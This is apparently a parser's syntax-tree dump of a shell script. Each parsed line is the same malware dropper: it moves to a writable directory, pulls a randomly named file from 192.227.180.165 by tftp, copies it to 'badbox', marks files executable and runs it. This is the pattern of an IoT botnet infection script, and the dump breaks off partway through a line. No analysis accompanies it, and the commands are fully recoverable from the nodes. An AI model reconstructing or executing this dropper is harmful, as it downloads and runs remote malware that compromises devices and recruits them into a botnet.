CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 184), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 141), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 122), word='dfnvgsfdag'),
    WordNode(lineno=4, pos=(123, 125), word='-g'),
    WordNode(lineno=4, pos=(126, 141), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(141, 142)),
  CommandNode(lineno=4, pos=(142, 164), parts=[
    WordNode(lineno=4, pos=(142, 145), word='cat'),
    WordNode(lineno=4, pos=(146, 156), word='dfnvgsfdag'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(158, 164), word='badbox'), pos=(157, 164), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(164, 165)),
  CommandNode(lineno=4, pos=(165, 175), parts=[
    WordNode(lineno=4, pos=(165, 170), word='chmod'),
    WordNode(lineno=4, pos=(171, 173), word='+x'),
    WordNode(lineno=4, pos=(174, 175), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(175, 176)),
  CommandNode(lineno=4, pos=(176, 184), parts=[
    WordNode(lineno=4, pos=(176, 184), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(185, 316), parts=[
  CommandNode(lineno=5, pos=(185, 192), parts=[
    WordNode(lineno=5, pos=(185, 187), word='cd'),
    WordNode(lineno=5, pos=(188, 192), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(193, 195)),
  CommandNode(lineno=5, pos=(196, 207), parts=[
    WordNode(lineno=5, pos=(196, 198), word='cd'),
    WordNode(lineno=5, pos=(199, 207), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(208, 210)),
  CommandNode(lineno=5, pos=(211, 218), parts=[
    WordNode(lineno=5, pos=(211, 213), word='cd'),
    WordNode(lineno=5, pos=(214, 218), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(219, 221)),
  CommandNode(lineno=5, pos=(222, 230), parts=[
    WordNode(lineno=5, pos=(222, 224), word='cd'),
    WordNode(lineno=5, pos=(225, 230), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(231, 233)),
  CommandNode(lineno=5, pos=(234, 238), parts=[
    WordNode(lineno=5, pos=(234, 236), word='cd'),
    WordNode(lineno=5, pos=(237, 238), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(238, 239)),
  CommandNode(lineno=5, pos=(240, 275), parts=[
    WordNode(lineno=5, pos=(240, 244), word='tftp'),
    WordNode(lineno=5, pos=(245, 247), word='-r'),
    WordNode(lineno=5, pos=(248, 256), word='dfngfdsg'),
    WordNode(lineno=5, pos=(257, 259), word='-g'),
    WordNode(lineno=5, pos=(260, 275), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(275, 276)),
  CommandNode(lineno=5, pos=(276, 296), parts=[
    WordNode(lineno=5, pos=(276, 279), word='cat'),
    WordNode(lineno=5, pos=(280, 288), word='dfngfdsg'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(290, 296), word='badbox'), pos=(289, 296), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(296, 297)),
  CommandNode(lineno=5, pos=(297, 307), parts=[
    WordNode(lineno=5, pos=(297, 302), word='chmod'),
    WordNode(lineno=5, pos=(303, 305), word='+x'),
    WordNode(lineno=5, pos=(306, 307), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(307, 308)),
  CommandNode(lineno=5, pos=(308, 316), parts=[
    WordNode(lineno=5, pos=(308, 316), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(317, 444), parts=[
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 339), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 339), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(340, 342)),
  CommandNode(lineno=6, pos=(343, 350), parts=[
    WordNode(lineno=6, pos=(343, 345), word='cd'),
    WordNode(lineno=6, pos=(346, 350), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(351, 353)),
  CommandNode(lineno=6, pos=(354, 362), parts=[
    WordNode(lineno=6, pos=(354, 356), word='cd'),
    WordNode(lineno=6, pos=(357, 362), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(363, 365)),
  CommandNode(lineno=6, pos=(366, 370), parts=[
    WordNode(lineno=6, pos=(366, 368), word='cd'),
    WordNode(lineno=6, pos=(369, 370), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(370, 371)),
  CommandNode(lineno=6, pos=(372, 405), parts=[
    WordNode(lineno=6, pos=(372, 376), word='tftp'),
    WordNode(lineno=6, pos=(377, 379), word='-r'),
    WordNode(lineno=6, pos=(380, 386), word='dfnsgf'),
    WordNode(lineno=6, pos=(387, 389), word='-g'),
    WordNode(lineno=6, pos=(390, 405), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(405, 406)),
  CommandNode(lineno=6, pos=(406, 424), parts=[
    WordNode(lineno=6, pos=(406, 409), word='cat'),
    WordNode(lineno=6, pos=(410, 416), word='dfnsgf'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(418, 424), word='badbox'), pos=(417, 424), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(424, 425)),
  CommandNode(lineno=6, pos=(425, 435), parts=[
    WordNode(lineno=6, pos=(425, 430), word='chmod'),
    WordNode(lineno=6, pos=(431, 433), word='+x'),
    WordNode(lineno=6, pos=(434, 435), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(435, 436)),
  CommandNode(lineno=6, pos=(436, 444), parts=[
    WordNode(lineno=6, pos=(436, 444), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(445, 578), parts=[
  CommandNode(lineno=7, pos=(445, 452), parts=[
    WordNode(lineno=7, pos=(445, 447), word='cd'),
    WordNode(lineno=7, pos=(448, 452), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(453, 455)),
  CommandNode(lineno=7, pos=(456, 467), parts=[
    WordNode(lineno=7, pos=(456, 458), word='cd'),
    WordNode(lineno=7, pos=(459, 467), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(468, 470)),
  CommandNode(lineno=7, pos=(471, 478), parts=[
    WordNode(lineno=7, pos=(471, 473), word='cd'),
    WordNode(lineno=7, pos=(474, 478), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(479, 481)),
  CommandNode(lineno=7, pos=(482, 490), parts=[
    WordNode(lineno=7, pos=(482, 484), word='cd'),
    WordNode(lineno=7, pos=(485, 490), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(491, 493)),
  CommandNode(lineno=7, pos=(494, 498), parts=[
    WordNode(lineno=7, pos=(494, 496), word='cd'),
    WordNode(lineno=7, pos=(497, 498), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(498, 499)),
  CommandNode(lineno=7, pos=(500, 536), parts=[
    WordNode(lineno=7, pos=(500, 504), word='tftp'),
    WordNode(lineno=7, pos=(505, 507), word='-r'),
    WordNode(lineno=7, pos=(508, 517), word='fgdndbsfg'),
    WordNode(lineno=7, pos=(518, 520), word='-g'),
    WordNode(lineno=7, pos=(521, 536), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(536, 537)),
  CommandNode(lineno=7, pos=(537, 558), parts=[
    WordNode(lineno=7, pos=(537, 540), word='cat'),
    WordNode(lineno=7, pos=(541, 550), word='fgdndbsfg'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(552, 558), word='badbox'), pos=(551, 558), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(558, 559)),
  CommandNode(lineno=7, pos=(559, 569), parts=[
    WordNode(lineno=7, pos=(559, 564), word='chmod'),
    WordNode(lineno=7, pos=(565, 567), word='+x'),
    WordNode(lineno=7, pos=(568, 569), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(569, 570)),
  CommandNode(lineno=7, pos=(570, 578), parts=[
    WordNode(lineno=7, pos=(570, 578), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(579, 718), parts=[
  CommandNode(lineno=8, pos=(579, 586), parts=[
    WordNode(lineno=8, pos=(579, 581), word='cd'),
    WordNode(lineno=8, pos=(582, 586), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(587, 589)),
  CommandNode(lineno=8, pos=(590, 601), parts=[
    WordNode(lineno=8, pos=(590, 592), word='cd'),
    WordNode(lineno=8, pos=(593, 601), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(602, 604)),
  CommandNode(lineno=8, pos=(605, 612), parts=[
    WordNode(lineno=8, pos=(605, 607), word='cd'),
    WordNode(lineno=8, pos=(608, 612), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(613, 615)),
  CommandNode(lineno=8, pos=(616, 624), parts=[
    WordNode(lineno=8, pos=(616, 618), word='cd'),
    WordNode(lineno=8, pos=(619, 624), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(625, 627)),
  CommandNode(lineno=8, pos=(628, 632), parts=[
    WordNode(lineno=8, pos=(628, 630), word='cd'),
    WordNode(lineno=8, pos=(631, 632), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(632, 633)),
  CommandNode(lineno=8, pos=(634, 673), parts=[
    WordNode(lineno=8, pos=(634, 638), word='tftp'),
    WordNode(lineno=8, pos=(639, 641), word='-r'),
    WordNode(lineno=8, pos=(642, 654), word='fnbdfnsdfbgf'),
    WordNode(lineno=8, pos=(655, 657), word='-g'),
    WordNode(lineno=8, pos=(658, 673), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(673, 674)),
  CommandNode(lineno=8, pos=(674, 698), parts=[
    WordNode(lineno=8, pos=(674, 677), word='cat'),
    WordNode(lineno=8, pos=(678, 690), word='fnbdfnsdfbgf'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(692, 698), word='badbox'), pos=(691, 698), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(698, 699)),
  CommandNode(lineno=8, pos=(699, 709), parts=[
    WordNode(lineno=8, pos=(699, 704), word='chmod'),
    WordNode(lineno=8, pos=(705, 707), word='+x'),
    WordNode(lineno=8, pos=(708, 709), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(709, 710)),
  CommandNode(lineno=8, pos=(710, 718), parts=[
    WordNode(lineno=8, pos=(710, 718), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(719, 872), parts=[
  CommandNode(lineno=9, pos=(719, 726), parts=[
    WordNode(lineno=9, pos=(719, 721), word='cd'),
    WordNode(lineno=9, pos=(722, 726), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(727, 729)),
  CommandNode(lineno=9, pos=(730, 741), parts=[
    WordNode(lineno=9, pos=(730, 732), word='cd'),
    WordNode(lineno=9, pos=(733, 741), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(742, 744)),
  CommandNode(lineno=9, pos=(745, 752), parts=[
    WordNode(lineno=9, pos=(745, 747), word='cd'),
    WordNode(lineno=9, pos=(748, 752), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(753, 755)),
  CommandNode(lineno=9, pos=(756, 764), parts=[
    WordNode(lineno=9, pos=(756, 758), word='cd'),
    WordNode(lineno=9, pos=(759, 764), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(765, 767)),
  CommandNode(lineno=9, pos=(768, 772), parts=[
    WordNode(lineno=9, pos=(768, 770), word='cd'),
    WordNode(lineno=9, pos=(771, 772), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(774, 820), parts=[
    WordNode(lineno=9, pos=(774, 778), word='tftp'),
    WordNode(lineno=9, pos=(779, 781), word='-r'),
    WordNode(lineno=9, pos=(782, 801), word='dnfnhbsr4334dfgddfg'),
    WordNode(lineno=9, pos=(802, 804), word='-g'),
    WordNode(lineno=9, pos=(805, 820), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(820, 821)),
  CommandNode(lineno=9, pos=(821, 852), parts=[
    WordNode(lineno=9, pos=(821, 824), word='cat'),
    WordNode(lineno=9, pos=(825, 844), word='dnfnhbsr4334dfgddfg'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(846, 852), word='badbox'), pos=(845, 852), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(852, 853)),
  CommandNode(lineno=9, pos=(853, 863), parts=[
    WordNode(lineno=9, pos=(853, 858), word='chmod'),
    WordNode(lineno=9, pos=(859, 861), word='+x'),
    WordNode(lineno=9, pos=(862, 863), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(863, 864)),
  CommandNode(lineno=9, pos=(864, 872), parts=[
    WordNode(lineno=9, pos=(864, 872), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(873, 1002), parts=[
  CommandNode(lineno=10, pos=(873, 880), parts=[
    WordNode(lineno=10, pos=(873, 875), word='cd'),
    WordNode(lineno=10, pos=(876, 880), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(881, 883)),
  CommandNode(lineno=10, pos=(884, 895), parts=[
    WordNode(lineno=10, pos=(884, 886), word='cd'),
    WordNode(lineno=10, pos=(887, 895), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(896, 898)),
  CommandNode(lineno=10, pos=(899, 906), parts=[
    WordNode(lineno=10, pos=(899, 901), word='cd'),
    WordNode(lineno=10, pos=(902, 906), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(907, 909)),
  CommandNode(lineno=10, pos=(910, 918), parts=[
    WordNode(lineno=10, pos=(910, 912), word='cd'),
    WordNode(lineno=10, pos=(913, 918), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(919, 921)),
  CommandNode(lineno=10, pos=(922, 926), parts=[
    WordNode(lineno=10, pos=(922, 924), word='cd'),
    WordNode(lineno=10, pos=(925, 926), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(926, 927)),
  CommandNode(lineno=10, pos=(928, 962), parts=[
    WordNode(lineno=10, pos=(928, 932), word='tftp'),
    WordNode(lineno=10, pos=(933, 935), word='-r'),
    WordNode(lineno=10, pos=(936, 943), word='fdsgsdf'),
    WordNode(lineno=10, pos=(944, 946), word='-g'),
    WordNode(lineno=10, pos=(947, 962), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(962, 963)),
  CommandNode(lineno=10, pos=(963, 982), parts=[
    WordNode(lineno=10, pos=(963, 966), word='cat'),
    WordNode(lineno=10, pos=(967, 974), word='fdsgsdf'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(976, 982), word='badbox'), pos=(975, 982), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(982, 983)),
  CommandNode(lineno=10, pos=(983, 993), parts=[
    WordNode(lineno=10, pos=(983, 988), word='chmod'),
    WordNode(lineno=10, pos=(989, 991), word='+x'),
    WordNode(lineno=10, pos=(992, 993), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(993, 994)),
  CommandNode(lineno=10, pos=(994, 1002), parts=[
    WordNode(lineno=10, pos=(994, 1002), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(1003, 1134), parts=[
  CommandNode(lineno=11, pos=(1003, 1010), parts=[
    WordNode(lineno=11, pos=(1003, 1005), word='cd'),
    WordNode(lineno=11, pos=(1006, 1010), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1011, 1013)),
  CommandNode(lineno=11, pos=(1014, 1025), parts=[
    WordNode(lineno=11, pos=(1014, 1016), word='cd'),
    WordNode(lineno=11, pos=(1017, 1025), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1026, 1028)),
  CommandNode(lineno=11, pos=(1029, 1036), parts=[
    WordNode(lineno=11, pos=(1029, 1031), word='cd'),
    WordNode(lineno=11, pos=(1032, 1036), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1037, 1039)),
  CommandNode(lineno=11, pos=(1040, 1048), parts=[
    WordNode(lineno=11, pos=(1040, 1042), word='cd'),
    WordNode(lineno=11, pos=(1043, 1048), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1049, 1051)),
  CommandNode(lineno=11, pos=(1052, 1056), parts=[
    WordNode(lineno=11, pos=(1052, 1054), word='cd'),
    WordNode(lineno=11, pos=(1055, 1056), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1056, 1057)),
  CommandNode(lineno=11, pos=(1058, 1093), parts=[
    WordNode(lineno=11, pos=(1058, 1062), word='tftp'),
    WordNode(lineno=11, pos=(1063, 1065), word='-r'),
    WordNode(lineno=11, pos=(1066, 1074), word='hh53sgfd'),
    WordNode(lineno=11, pos=(1075, 1077), word='-g'),
    WordNode(lineno=11, pos=(1078, 1093), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1093, 1094)),
  CommandNode(lineno=11, pos=(1094, 1114), parts=[
    WordNode(lineno=11, pos=(1094, 1097), word='cat'),
    WordNode(lineno=11, pos=(1098, 1106), word='hh53sgfd'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1108, 1114), word='badbox'), pos=(1107, 1114), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1114, 1115)),
  CommandNode(lineno=11, pos=(1115, 1125), parts=[
    WordNode(lineno=11, pos=(1115, 1120), word='chmod'),
    WordNode(lineno=11, pos=(1121, 1123), word='+x'),
    WordNode(lineno=11, pos=(1124, 1125), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1125, 1126)),
  CommandNode(lineno=11, pos=(1126, 1134), parts=[
    WordNode(lineno=11, pos=(1126, 1134), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1135, 1272), parts=[
  CommandNode(lineno=12, pos=(1135, 1142), parts=[
    WordNode(lineno=12, pos=(1135, 1137), word='cd'),
    WordNode(lineno=12, pos=(1138, 1142), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1143, 1145)),
  CommandNode(lineno=12, pos=(1146, 1157), parts=[
    WordNode(lineno=12, pos=(1146, 1148), word='cd'),
    WordNode(lineno=12, pos=(1149, 1157), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1158, 1160)),
  CommandNode(lineno=12, pos=(1161, 1168), parts=[
    WordNode(lineno=12, pos=(1161, 1163), word='cd'),
    WordNode(lineno=12, pos=(1164, 1168), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1169, 1171)),
  CommandNode(lineno=12, pos=(1172, 1180), parts=[
    WordNode(lineno=12, pos=(1172, 1174), word='cd'),
    WordNode(lineno=12, pos=(1175, 1180), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1181, 1183)),
  CommandNode(lineno=12, pos=(1184, 1188), parts=[
    WordNode(lineno=12, pos=(1184, 1186), word='cd'),
    WordNode(lineno=12, pos=(1187, 1188), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1188, 1189)),
  CommandNode(lineno=12, pos=(1190, 1228), parts=[
    WordNode(lineno=12, pos=(1190, 1194), word='tftp'),
    WordNode(lineno=12, pos=(1195, 1197), word='-r'),
    WordNode(lineno=12, pos=(1198, 1209), word='45bbrhfghjd'),
    WordNode(lineno=12, pos=(1210, 1212), word='-g'),
    WordNode(lineno=12, pos=(1213, 1228), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1228, 1229)),
  CommandNode(lineno=12, pos=(1229, 1252), parts=[
    WordNode(lineno=12, pos=(1229, 1232), word='cat'),
    WordNode(lineno=12, pos=(1233, 1244), word='45bbrhfghjd'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1246, 1252), word='badbox'), pos=(1245, 1252), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1252, 1253)),
  CommandNode(lineno=12, pos=(1253, 1263), parts=[
    WordNode(lineno=12, pos=(1253, 1258), word='chmod'),
    WordNode(lineno=12, pos=(1259, 1261), word='+x'),
    WordNode(lineno=12, pos=(1262, 1263), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1263, 1264)),
  CommandNode(lineno=12, pos=(1264, 1272), parts=[
    WordNode(lineno=12, pos=(1264, 1272), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1273, 1426), parts=[
  CommandNode(lineno=13, pos=(1273, 1280), parts=[
    WordNode(lineno=13, pos=(1273, 1275), word='cd'),
    WordNode(lineno=13, pos=(1276, 1280), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1281, 1283)),
  CommandNode(lineno=13, pos=(1284, 1295), parts=[
    WordNode(lineno=13, pos=(1284, 1286), word='cd'),
    WordNode(lineno=13, pos=(1287, 1295), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1296, 1298)),
  CommandNode(lineno=13, pos=(1299, 1306), parts=[
    WordNode(lineno=13, pos=(1299, 1301), word='cd'),
    WordNode(lineno=13, pos=(1302, 1306), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1307, 1309)),
  CommandNode(lineno=13, pos=(1310, 1318), parts=[
    WordNode(lineno=13, pos=(1310, 1312), word='cd'),
    WordNode(lineno=13, pos=(1313, 1318), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1319, 1321)),
  CommandNode(lineno=13, pos=(1322, 1326), parts=[
    WordNode(lineno=13, pos=(1322, 1324), word='cd'),
    WordNode(lineno=13, pos=(1325, 1326), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1326, 1327)),
  CommandNode(lineno=13, pos=(1328, 1374), parts=[
    WordNode(lineno=13, pos=(1328, 1332), word='tftp'),
    WordNode(lineno=13, pos=(1333, 1335), word='-r'),
    WordNode(lineno=13, pos=(1336, 1355), word='3456hfgdhgfjfdjdjfd'),
    WordNode(lineno=13, pos=(1356, 1358), word='-g'),
    WordNode(lineno=13, pos=(1359, 1374), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1374, 1375)),
  CommandNode(lineno=13, pos=(1375, 1406), parts=[
    WordNode(lineno=13, pos=(1375, 1378), word='cat'),
    WordNode(lineno=13, pos=(1379, 1398), word='3456hfgdhgfjfdjdjfd'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1400, 1406), word='badbox'), pos=(1399, 1406), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1406, 1407)),
  CommandNode(lineno=13, pos=(1407, 1417), parts=[
    WordNode(lineno=13, pos=(1407, 1412), word='chmod'),
    WordNode(lineno=13, pos=(1413, 1415), word='+x'),
    WordNode(lineno=13, pos=(1416, 1417), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1417, 1418)),
  CommandNode(lineno=13, pos=(1418, 1426), parts=[
    WordNode(lineno=13, pos=(1418, 1426), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1427, 1572), parts=[
  CommandNode(lineno=14, pos=(1427, 1434), parts=[
    WordNode(lineno=14, pos=(1427, 1429), word='cd'),
    WordNode(lineno=14, pos=(1430, 1434), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1435, 1437)),
  CommandNode(lineno=14, pos=(1438, 1449), parts=[
    WordNode(lineno=14, pos=(1438, 1440), word='cd'),
    WordNode(lineno=14, pos=(1441, 1449), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1450, 1452)),
  CommandNode(lineno=14, pos=(1453, 1460), parts=[
    WordNode(lineno=14, pos=(1453, 1455), word='cd'),
    WordNode(lineno=14, pos=(1456, 1460), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1461, 1463)),
  CommandNode(lineno=14, pos=(1464, 1472), parts=[
    WordNode(lineno=14, pos=(1464, 1466), word='cd'),
    WordNode(lineno=14, pos=(1467, 1472), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1473, 1475)),
  CommandNode(lineno=14, pos=(1476, 1480), parts=[
    WordNode(lineno=14, pos=(1476, 1478), word='cd'),
    WordNode(lineno=14, pos=(1479, 1480), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1480, 1481)),
  CommandNode(lineno=14, pos=(1482, 1524), parts=[
    WordNode(lineno=14, pos=(1482, 1486), word='tftp'),
    WordNode(lineno=14, pos=(1487, 1489), word='-r'),
    WordNode(lineno=14, pos=(1490, 1505), word='[dfjdfjgfdjhrf]'),
    WordNode(lineno=14, pos=(1506, 1508), word='-g'),
    WordNode(lineno=14, pos=(1509, 1524), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1524, 1525)),
  CommandNode(lineno=14, pos=(1525, 1552), parts=[
    WordNode(lineno=14, pos=(1525, 1528), word='cat'),
    WordNode(lineno=14, pos=(1529, 1544), word='[dfjdfjgfdjhrf]'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1546, 1552), word='badbox'), pos=(1545, 1552), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1552, 1553)),
  CommandNode(lineno=14, pos=(1553, 1563), parts=[
    WordNode(lineno=14, pos=(1553, 1558), word='chmod'),
    WordNode(lineno=14, pos=(1559, 1561), word='+x'),
    WordNode(lineno=14, pos=(1562, 1563), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1563, 1564)),
  CommandNode(lineno=14, pos=(1564, 1572), parts=[
    WordNode(lineno=14, pos=(1564, 1572), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1573, 1718), parts=[
  CommandNode(lineno=15, pos=(1573, 1580), parts=[
    WordNode(lineno=15, pos=(1573, 1575), word='cd'),
    WordNode(lineno=15, pos=(1576, 1580), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1581, 1583)),
  CommandNode(lineno=15, pos=(1584, 1595), parts=[
    WordNode(lineno=15, pos=(1584, 1586), word='cd'),
    WordNode(lineno=15, pos=(1587, 1595), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1596, 1598)),
  CommandNode(lineno=15, pos=(1599, 1606), parts=[
    WordNode(lineno=15, pos=(1599, 1601), word='cd'),
    WordNode(lineno=15, pos=(1602, 1606), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1607, 1609)),
  CommandNode(lineno=15, pos=(1610, 1618), parts=[
    WordNode(lineno=15, pos=(1610, 1612), word='cd'),
    WordNode(lineno=15, pos=(1613, 1618), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1619, 1621)),
  CommandNode(lineno=15, pos=(1622, 1626), parts=[
    WordNode(lineno=15, pos=(1622, 1624), word='cd'),
    WordNode(lineno=15, pos=(1625, 1626), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1626, 1627)),
  CommandNode(lineno=15, pos=(1628, 1670), parts=[
    WordNode(lineno=15, pos=(1628, 1632), word='tftp'),
    WordNode(lineno=15, pos=(1633, 1635), word='-r'),
    WordNode(lineno=15, pos=(1636, 1651), word='fjdfdfhfgdhfgdj'),
    WordNode(lineno=15, pos=(1652, 1654), word='-g'),
    WordNode(lineno=15, pos=(1655, 1670), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1670, 1671)),
  CommandNode(lineno=15, pos=(1671, 1698), parts=[
    WordNode(lineno=15, pos=(1671, 1674), word='cat'),
